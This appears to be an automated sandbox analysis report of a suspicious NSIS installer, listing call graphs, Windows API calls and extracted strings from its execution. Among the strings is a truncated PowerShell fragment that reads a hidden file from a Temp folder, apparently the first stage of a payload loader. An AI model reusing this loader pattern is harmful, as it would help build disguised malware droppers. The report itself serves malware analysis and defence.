3610->3611 3612 402c98 3611->3612 3613 4060f1 RegOpenKeyExW 3612->3613 3614 40239d 3613->3614 3614->3605 3614->3607 3616 402d13 3615->3616 3617 402d0c 3615->3617 3616->3617 3619 402d44 3616->3619 3617->3607 3620 4060f1 RegOpenKeyExW 3619->3620 3621 402d72 3620->3621 3622 402dec 3621->3622 3626 402d76 3621->3626 3622->3617 3623 402d98 RegEnumKeyW 3624 402daf RegCloseKey 3623->3624 3623->3626 3627 40665e 5 API calls 3624->3627 3625 402dd0 RegCloseKey 3625->3622 3626->3623 3626->3624 3626->3625 3628 402d44 6 API calls 3626->3628 3629 402dbf 3627->3629 3628->3626 3630 402de0 RegDeleteKeyW 3629->3630 3631 402dc3 3629->3631 3630->3622 3631->3622 4515 40698e 4521 406812 4515->4521 4516 40717d 4517 406893 GlobalFree 4518 40689c GlobalAlloc 4517->4518 4518->4516 4518->4521 4519 406913 GlobalAlloc 4519->4516 4519->4521 4520 40690a GlobalFree 4520->4519 4521->4516 4521->4517 4521->4518 4521->4519 4521->4520 4522 40190f 4523 402c41 17 API calls 4522->4523 4524 401916 4523->4524 4525 4058ea MessageBoxIndirectW 4524->4525 4526 40191f 4525->4526 4527 401491 4528 4052ec 24 API calls 4527->4528 4529 401498 4528->4529 4530 401d14 4531 402c1f 17 API calls 4530->4531 4532 401d1b 4531->4532 4533 402c1f 17 API calls 4532->4533 4534 401d27 GetDlgItem 4533->4534 4535 402592 4534->4535 4543 402598 4544 4025c7 4543->4544 4545 4025ac 4543->4545 4547 4025fb 4544->4547 4548 4025cc 4544->4548 4546 402c1f 17 API calls 4545->4546 4553 4025b3 4546->4553 4550 402c41 17 API calls 4547->4550 4549 402c41 17 API calls 4548->4549 4551 4025d3 WideCharToMultiByte lstrlenA 4549->4551 4552 402602 lstrlenW 4550->4552 4551->4553 4552->4553 4554 40262f 4553->4554 4556 405e5b 5 API calls 4553->4556 4557 402645 4553->4557 4555 405e2c WriteFile 4554->4555 4554->4557 4555->4557 4556->4554 4558 40149e 4559 4014ac PostQuitMessage 4558->4559 4560 4022f7 4558->4560 4559->4560 4561 401c1f 4562 402c1f 17 API calls 4561->4562 4563 401c26 4562->4563 4564 402c1f 17 API calls 4563->4564 4565 401c33 4564->4565 4566 401c48 4565->4566 4567 402c41 17 API calls 4565->4567 4568 401c58 4566->4568 4569 402c41 17 API calls 4566->4569 4567->4566 4570 401c63 4568->4570 4571 401caf 4568->4571 4569->4568 4573 402c1f 17 API calls 4570->4573 4572 402c41 17 API calls 4571->4572 4574 401cb4 4572->4574 4575 401c68 4573->4575 4576 402c41 17 API calls 4574->4576 4577 402c1f 17 API calls 4575->4577 4578 401cbd FindWindowExW 4576->4578 4579 401c74 4577->4579 4582 401cdf 4578->4582 4580 401c81 SendMessageTimeoutW 4579->4580 4581 401c9f SendMessageW 4579->4581 4580->4582 4581->4582 4583 402aa0 SendMessageW 4584 402ac5 4583->4584 4585 402aba InvalidateRect 4583->4585 4585->4584 4586 402821 4587 402827 4586->4587 4588 40282f FindClose 4587->4588 4589 402ac5 4587->4589 4588->4589 3276 403d22 3277 403e75 3276->3277 3278 403d3a 3276->3278 3279 403ec6 3277->3279 3280 403e86 GetDlgItem GetDlgItem 3277->3280 3278->3277 3281 403d46 3278->3281 3283 403f20 3279->3283 3293 401389 2 API calls 3279->3293 3282 4041fb 18 API calls 3280->3282 3284 403d51 SetWindowPos 3281->3284 3285 403d64 3281->3285 3288 403eb0 SetClassLongW 3282->3288 3308 403e70 3283->3308 3347 404247 3283->3347 3284->3285 3286 403d81 3285->3286 3287 403d69 ShowWindow 3285->3287 3290 403da3 3286->3290 3291 403d89 DestroyWindow 3286->3291 3287->3286 3292 40140b 2 API calls 3288->3292 3294 403da8 SetWindowLongW 3290->3294 3295 403db9 3290->3295 3346 404184 3291->3346 3292->3279 3296 403ef8 3293->3296 3294->3308 3299 403e62 3295->3299 3300 403dc5 GetDlgItem 3295->3300 3296->3283 3301 403efc SendMessageW 3296->3301 3297 40140b 2 API calls 3320 403f32 3297->3320 3298 404186 DestroyWindow EndDialog 3298->3346 3369 404262 3299->3369 3303 403df5 3300->3303 3304 403dd8 SendMessageW IsWindowEnabled 3300->3304 3301->3308 3302 4041b5 ShowWindow 3302->3308 3307 403dfa 3303->3307 3309 403e02 3303->3309 3311 403e49 SendMessageW 3303->3311 3312 403e15 3303->3312 3304->3303 3304->3308 3306 4062a6 17 API calls 3306->3320 3366 4041d4 3307->3366 3309->3307 3309->3311 3311->3299 3313 403e32 3312->3313 3314 403e1d 3312->3314 3317 40140b 2 API calls 3313->3317 3363 40140b 3314->3363 3315 403e30 3315->3299 3319 403e39 3317->3319 3318 4041fb 18 API calls 3318->3320 3319->3299 3319->3307 3320->3297 3320->3298 3320->3306 3320->3308 3320->3318 3337 4040c6 DestroyWindow 3320->3337 3350 4041fb 3320->3350 3322 403fad GetDlgItem 3323 403fc2 3322->3323 3324 403fca ShowWindow KiUserCallbackDispatcher 3322->3324 3323->3324 3353 40421d KiUserCallbackDispatcher 3324->3353 3326 403ff4 EnableWindow 3331 404008 3326->3331 3327 40400d GetSystemMenu EnableMenuItem SendMessageW 3328 40403d SendMessageW 3327->3328 3327->3331 3328->3331 3331->3327 3354 404230 SendMessageW 3331->3354 3355 403d03 3331->3355 3358 406284 lstrcpynW 3331->3358 3333 40406c lstrlenW 3334 4062a6 17 API calls 3333->3334 3335 404082 SetWindowTextW 3334->3335 3359 401389 3335->3359 3338 4040e0 CreateDialogParamW 3337->3338 3337->3346 3339 404113 3338->3339 3338->3346 3340 4041fb 18 API calls 3339->3340 3341 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3340->3341 3342 401389 2 API calls 3341->3342 3343 404164 3342->3343 3343->3308 3344 40416c ShowWindow 3343->3344 3345 404247 SendMessageW 3344->3345 3345->3346 3346->3302 3346->3308 3348 404250 SendMessageW 3347->3348 3349 40425f 3347->3349 3348->3349 3349->3320 3351 4062a6 17 API calls 3350->3351 3352 404206 SetDlgItemTextW 3351->3352 3352->3322 3353->3326 3354->3331 3356 4062a6 17 API calls 3355->3356 3357 403d11 SetWindowTextW 3356->3357 3357->3331 3358->3333 3361 401390 3359->3361 3360 4013fe 3360->3320 3361->3360 3362 4013cb MulDiv SendMessageW 3361->3362 3362->3361 3364 401389 2 API calls 3363->3364 3365 401420 3364->3365 3365->3307 3367 4041e1 SendMessageW 3366->3367 3368 4041db 3366->3368 3367->3315 3368->3367 3370 404325 3369->3370 3371 40427a GetWindowLongW 3369->3371 3370->3308 3371->3370 3372 40428f 3371->3372 3372->3370 3373 4042bc GetSysColor 3372->3373 3374 4042bf 3372->3374 3373->3374 3375 4042c5 SetTextColor 3374->3375 3376 4042cf SetBkMode 3374->3376 3375->3376 3377 4042e7 GetSysColor 3376->3377 3378 4042ed 3376->3378 3377->3378 3379 4042f4 SetBkColor 3378->3379 3380 4042fe 3378->3380 3379->3380 3380->3370 3381 404311 DeleteObject 3380->3381 3382 404318 CreateBrushIndirect 3380->3382 3381->3382 3382->3370 3383 4015a3 3384 402c41 17 API calls 3383->3384 3385 4015aa SetFileAttributesW 3384->3385 3386 4015bc 3385->3386 4590 4046a5 4591 4046b5 4590->4591 4592 4046db 4590->4592 4593 4041fb 18 API calls 4591->4593 4594 404262 8 API calls 4592->4594 4596 4046c2 SetDlgItemTextW 4593->4596 4595 4046e7 4594->4595 4596->4592 4597 4029a8 4598 402c1f 17 API calls 4597->4598 4599 4029ae 4598->4599 4600 4029d5 4599->4600 4601 4029ee 4599->4601 4608 40288b 4599->4608 4602 4029da 4600->4602 4603 4029eb 4600->4603 4604 402a08 4601->4604 4605 4029f8 4601->4605 4611 406284 lstrcpynW 4602->4611 4603->4608 4612 4061cb wsprintfW 4603->4612 4607 4062a6 17 API calls 4604->4607 4606 402c1f 17 API calls 4605->4606 4606->4603 4607->4603 4611->4608 4612->4608 3508 40542b 3509 4055d5 3508->3509 3510 40544c GetDlgItem GetDlgItem GetDlgItem 3508->3510 3512 405606 3509->3512 3513 4055de GetDlgItem CreateThread CloseHandle 3509->3513 3553 404230 SendMessageW 3510->3553 3515 405631 3512->3515 3516 405656 3512->3516 3517 40561d ShowWindow ShowWindow 3512->3517 3513->3512 3556 4053bf OleInitialize 3513->3556 3514 4054bc 3522 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3514->3522 3518 405691 3515->3518 3519 405645 3515->3519 3520 40566b ShowWindow 3515->3520 3521 404262 8 API calls 3516->3521 3555 404230 SendMessageW 3517->3555 3518->3516 3530 40569f SendMessageW 3518->3530 3524 4041d4 SendMessageW 3519->3524 3526 40568b 3520->3526 3527 40567d 3520->3527 3525 405664 3521->3525 3528 405531 3522->3528 3529 405515 SendMessageW SendMessageW 3522->3529 3524->3516 3532 4041d4 SendMessageW 3526->3532 3531 4052ec 24 API calls 3527->3531 3533 405544 3528->3533 3534 405536 SendMessageW 3528->3534 3529->3528 3530->3525 3535 4056b8 CreatePopupMenu 3530->3535 3531->3526 3532->3518 3537 4041fb 18 API calls 3533->3537 3534->3533 3536 4062a6 17 API calls 3535->3536 3539 4056c8 AppendMenuW 3536->3539 3538 405554 3537->3538 3542 405591 GetDlgItem SendMessageW 3538->3542 3543 40555d ShowWindow 3538->3543 3540 4056e5 GetWindowRect 3539->3540 3541 4056f8 TrackPopupMenu 3539->3541 3540->3541 3541->3525 3544 405713 3541->3544 3542->3525 3547 4055b8 SendMessageW SendMessageW 3542->3547 3545 405580 3543->3545 3546 405573 ShowWindow 3543->3546 3548 40572f SendMessageW 3544->3548 3554 404230 SendMessageW 3545->3554 3546->3545 3547->3525 3548->3548 3549 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3548->3549 3551 405771 SendMessageW 3549->3551 3551->3551 3552 40579a GlobalUnlock SetClipboardData CloseClipboard 3551->3552 3552->3525 3553->3514 3554->3542 3555->3515 3557 404247 SendMessageW 3556->3557 3560 4053e2 3557->3560 3558 405409 3559 404247 SendMessageW 3558->3559 3561 40541b OleUninitialize 3559->3561 3560->3558 3562 401389 2 API calls 3560->3562 3562->3560 4620 4028ad 4621 402c41 17 API calls 4620->4621 4622 4028bb 4621->4622 4623 4028d1 4622->4623 4624 402c41 17 API calls 4622->4624 4625 405d55 2 API calls 4623->4625 4624->4623 4626 4028d7 4625->4626 4648 405d7a GetFileAttributesW CreateFileW 4626->4648 4628 4028e4 4629 4028f0 GlobalAlloc 4628->4629 4630 402987 4628->4630 4633 402909 4629->4633 4634 40297e CloseHandle 4629->4634 4631 4029a2 4630->4631 4632 40298f DeleteFileW 4630->4632 4632->4631 4649 403311 SetFilePointer 4633->4649 4634->4630 4636 40290f 4637 4032fb ReadFile 4636->4637 4638 402918 GlobalAlloc 4637->4638 4639 402928 4638->4639 4640 40295c 4638->4640 4641 403116 35 API calls 4639->4641 4642 405e2c WriteFile 4640->4642 4647 402935 4641->4647 4643 402968 GlobalFree 4642->4643 4644 403116 35 API calls 4643->4644 4645 40297b 4644->4645 4645->4634 4646 402953 GlobalFree 4646->4640 4647->4646 4648->4628 4649->4636 3686 4058b0 ShellExecuteExW 4650 401a30 4651 402c41 17 API calls 4650->4651 4652 401a39 ExpandEnvironmentStringsW 4651->4652 4653 401a4d 4652->4653 4655 401a60 4652->4655 4654 401a52 lstrcmpW 4653->4654 4653->4655 4654->4655 4656 404331 lstrcpynW lstrlenW 4657 402032 4658 402044 4657->4658 4659 4020f6 4657->4659 4660 402c41 17 API calls 4658->4660 4661 401423 24 API calls 4659->4661 4662 40204b 4660->4662 4668 402250 4661->4668 4663 402c41 17 API calls 4662->4663 4664 402054 4663->4664 4665 40206a LoadLibraryExW 4664->4665 4666 40205c GetModuleHandleW 4664->4666 4665->4659 4667 40207b 4665->4667 4666->4665 4666->4667 4677 4066cd WideCharToMultiByte 4667->4677 4671 4020c5 4673 4052ec 24 API calls 4671->4673 4672 40208c 4674 401423 24 API calls 4672->4674 4675 40209c 4672->4675 4673->4675 4674->4675 4675->4668 4676 4020e8 FreeLibrary 4675->4676 4676->4668 4678 4066f7 GetProcAddress 4677->4678 4679 402086 4677->4679 4678->4679 4679->4671 4679->4672 4680 403932 4681 40393d 4680->4681 4682 403944 GlobalAlloc 4681->4682 4683 403941 4681->4683 4682->4683 3692 401735 3693 402c41 17 API calls 3692->3693 3694 40173c SearchPathW 3693->3694 3695 401757 3694->3695 4689 402a35 4690 402c1f 17 API calls 4689->4690 4691 402a3b 4690->4691 4692 402a72 4691->4692 4693 40288b 4691->4693 4695 402a4d 4691->4695 4692->4693 4694 4062a6 17 API calls 4692->4694 4694->4693 4695->4693 4697 4061cb wsprintfW 4695->4697 4697->4693 4698 4014b8 4699 4014be 4698->4699 4700 401389 2 API calls 4699->4700 4701 4014c6 4700->4701 4702 401db9 GetDC 4703 402c1f 17 API calls 4702->4703 4704 401dcb GetDeviceCaps MulDiv ReleaseDC 4703->4704 4705 402c1f 17 API calls 4704->4705 4706 401dfc 4705->4706 4707 4062a6 17 API calls 4706->4707 4708 401e39 CreateFontIndirectW 4707->4708 4709 402592 4708->4709 4710 4043ba 4712 4044ec 4710->4712 4713 4043d2 4710->4713 4711 404556 4714 404620 4711->4714 4715 404560 GetDlgItem 4711->4715 4712->4711 4712->4714 4719 404527 GetDlgItem SendMessageW 4712->4719 4716 4041fb 18 API calls 4713->4716 4721 404262 8 API calls 4714->4721 4717 4045e1 4715->4717 4718 40457a 4715->4718 4720 404439 4716->4720 4717->4714 4726 4045f3 4717->4726 4718->4717 4725 4045a0 SendMessageW LoadCursorW SetCursor 4718->4725 4743 40421d KiUserCallbackDispatcher 4719->4743 4723 4041fb 18 API calls 4720->4723 4724 40461b 4721->4724 4728 404446 CheckDlgButton 4723->4728 4744 404669 4725->4744 4730 404609 4726->4730 4731 4045f9 SendMessageW 4726->4731 4727 404551 4733 404645 SendMessageW 4727->4733 4741 40421d KiUserCallbackDispatcher 4728->4741 4730->4724 4732 40460f SendMessageW 4730->4732 4731->4730 4732->4724 4733->4711 4736 404464 GetDlgItem 4742 404230 SendMessageW 4736->4742 4738 40447a SendMessageW 4739 4044a0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4738->4739 4740 404497 GetSysColor 4738->4740 4739->4724 4740->4739 4741->4736 4742->4738 4743->4727 4747 4058b0 ShellExecuteExW 4744->4747 4746 4045cf LoadCursorW SetCursor 4746->4717 4747->4746 4748 40283b 4749 402843 4748->4749 4750 402847 FindNextFileW 4749->4750 4753 402859 4749->4753 4751 4028a0 4750->4751 4750->4753 4754 406284 lstrcpynW 4751->4754 4754->4753

                                                                                                        Executed Functions

                                                                                                        Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410stringfilecomCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 403359-403396 SetErrorMode GetVersion 1 403398-4033a0 call 40665e 0->1 2 4033a9 0->2 1->2 7 4033a2 1->7 4 4033ae-4033c2 call 4065ee lstrlenA 2->4 9 4033c4-4033e0 call 40665e * 3 4->9 7->2 16 4033f1-403450 #17 OleInitialize SHGetFileInfoW call 406284 GetCommandLineW call 406284 9->16 17 4033e2-4033e8 9->17 24 403452-403459 16->24 25 40345a-403474 call 405b86 CharNextW 16->25 17->16 21 4033ea 17->21 21->16 24->25 28 40347a-403480 25->28 29 40358b-4035a5 GetTempPathW call 403328 25->29 30 403482-403487 28->30 31 403489-40348d 28->31 38 4035a7-4035c5 GetWindowsDirectoryW lstrcatW call 403328 29->38 39 4035fd-403617 DeleteFileW call 402edd 29->39 30->30 30->31 33 403494-403498 31->33 34 40348f-403493 31->34 36 403557-403564 call 405b86 33->36 37 40349e-4034a4 33->37 34->33 52 403566-403567 36->52 53 403568-40356e 36->53 42 4034a6-4034ae 37->42 43 4034bf-4034f8 37->43 38->39 58 4035c7-4035f7 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403328 38->58 54 4036c8-4036d8 call 40389a OleUninitialize 39->54 55 40361d-403623 39->55 47 4034b0-4034b3 42->47 48 4034b5 42->48 49 403515-40354f 43->49 50 4034fa-4034ff 43->50 47->43 47->48 48->43 49->36 57 403551-403555 49->57 50->49 56 403501-403509 50->56 52->53 53->28 59 403574 53->59 75 4037fe-403804 54->75 76 4036de-4036ee call 4058ea ExitProcess 54->76 60 4036b8-4036bf call 403974 55->60 61 403629-403634 call 405b86 55->61 63 403510 56->63 64 40350b-40350e 56->64 57->36 65 403576-403584 call 406284 57->65 58->39 58->54 68 403589 59->68 74 4036c4 60->74 79 403682-40368c 61->79 80 403636-40366b 61->80 63->49 64->49 64->63 65->68 68->29 74->54 77 403882-40388a 75->77 78 403806-40381c GetCurrentProcess OpenProcessToken 75->78 85 403890-403894 ExitProcess 77->85 86 40388c 77->86 82 403852-403860 call 40665e 78->82 83 40381e-40384c LookupPrivilegeValueW AdjustTokenPrivileges 78->83 87 4036f4-403708 call 405855 lstrcatW 79->87 88 40368e-40369c call 405c61 79->88 84 40366d-403671 80->84 102 403862-40386c 82->102 103 40386e-403879 ExitWindowsEx 82->103 83->82 92 403673-403678 84->92 93 40367a-40367e 84->93 86->85 100 403715-40372f lstrcatW lstrcmpiW 87->100 101 40370a-403710 lstrcatW 87->101 88->54 99 40369e-4036b4 call 406284 * 2 88->99 92->93 98 403680 92->98 93->84 93->98 98->79 99->60 100->54 105 403731-403734 100->105 101->100 102->103 106 40387b-40387d call 40140b 102->106 103->77 103->106 108 403736-40373b call 4057bb 105->108 109 40373d call 405838 105->109 106->77 117 403742-403750 SetCurrentDirectoryW 108->117 109->117 118 403752-403758 call 406284 117->118 119 40375d-403786 call 406284 117->119 118->119 123 40378b-4037a7 call 4062a6 DeleteFileW 119->123 126 4037e8-4037f0 123->126 127 4037a9-4037b9 CopyFileW 123->127 126->123 129 4037f2-4037f9 call 40604a 126->129 127->126 128 4037bb-4037db call 40604a call 4062a6 call 40586d 127->128 128->126 138 4037dd-4037e4 CloseHandle 128->138 129->54 138->126
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE ref: 0040337C
                                                                                                        • GetVersion.KERNEL32 ref: 00403382
                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
                                                                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
                                                                                                        • OleInitialize.OLE32(00000000), ref: 004033F9
                                                                                                        • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
                                                                                                        • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
                                                                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000020,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462
                                                                                                          • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                                          • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
                                                                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
                                                                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
                                                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
                                                                                                        • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602
                                                                                                          • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                        • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
                                                                                                        • ExitProcess.KERNEL32 ref: 004036EE
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
                                                                                                        • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
                                                                                                        • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Cpfkf79Rzk.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
                                                                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403743
                                                                                                        • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,"$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu,00000008,?,00000006,00000008,0000000A), ref: 0040379D
                                                                                                        • CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
                                                                                                        • CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
                                                                                                        • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403814
                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
                                                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
                                                                                                        • ExitProcess.KERNEL32 ref: 00403894
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1512408237.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1512384001.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512430839.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512453597.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1512643537.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cpfkf79Rzk.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                        • String ID: "$Quadruplicates=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\depersonaliseredes\Opjustering\ubekrftede.Amo';$syndactylu$"C:\Users\user\Desktop\Cpfkf79Rzk.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user~1\AppData\Local\Temp\depersonaliseredes$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                        • API String ID: 3441113951-1942017461
                                                                                                        • Opcode ID: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                                                        • Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
                                                                                                        • Opcode Fuzzy Hash: b19ebecd6ca5737548316411bb107f2a7d046da96c0e713e32cea02ef9e1e94b
                                                                                                        • Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E
                                                                                                        Function 0040542B Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 139 40542b-405446 140 4055d5-4055dc 139->140 141 40544c-405513 GetDlgItem * 3 call 404230 call 404b89 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 405606-405613 140->143 144 4055de-405600 GetDlgItem CreateThread CloseHandle 140->144 163 405531-405534 141->163 164 405515-40552f SendMessageW * 2 141->164 146 405631-40563b 143->146 147 405615-40561b 143->147 144->143 151 405691-405695 146->151 152 40563d-405643 146->152 149 405656-40565f call 404262 147->149 150 40561d-40562c ShowWindow * 2 call 404230 147->150 160 405664-405668 149->160 150->146 151->149 157 405697-40569d 151->157 153 405645-405651 call 4041d4 152->153 154 40566b-40567b ShowWindow 152->154 153->149 161 40568b-40568c call 4041d4 154->161 162 40567d-405686 call 4052ec 154->162 157->149 165 40569f-4056b2 SendMessageW 157->165 161->151 162->161 168 405544-40555b call 4041fb 163->168 169 405536-405542 SendMessageW 163->169 164->163 170 4057b4-4057b6 165->170 171 4056b8-4056e3 CreatePopupMenu call 4062a6 AppendMenuW 165->171 178 405591-4055b2 GetDlgItem SendMessageW 168->178 179 40555d-405571 ShowWindow 168->179 169->168 170->160 176 4056e5-4056f5 GetWindowRect 171->176 177 4056f8-40570d TrackPopupMenu 171->177 176->177 177->170 180 405713-40572a 177->180 178->170 183 4055b8-4055d0 SendMessageW * 2 178->183 181 405580 179->181 182 405573-40557e ShowWindow 179->182 184 40572f-40574a SendMessageW 180->184 185 405586-40558c call 404230 181->185 182->185 183->170 184->184 186 40574c-40576f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->178 188 405771-405798 SendMessageW 186->188 188->188 189 40579a-4057ae GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405489
                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405498
                                                                                                        • GetClientRect.USER32(?,?), ref: 004054D5
                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004054DC
                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405578
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405599
                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004054A7
                                                                                                          • Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004055EB
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405600
                                                                                                        • ShowWindow.USER32(00000000), ref: 00405624
                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405629
                                                                                                        • ShowWindow.USER32(00000008), ref: 00405673
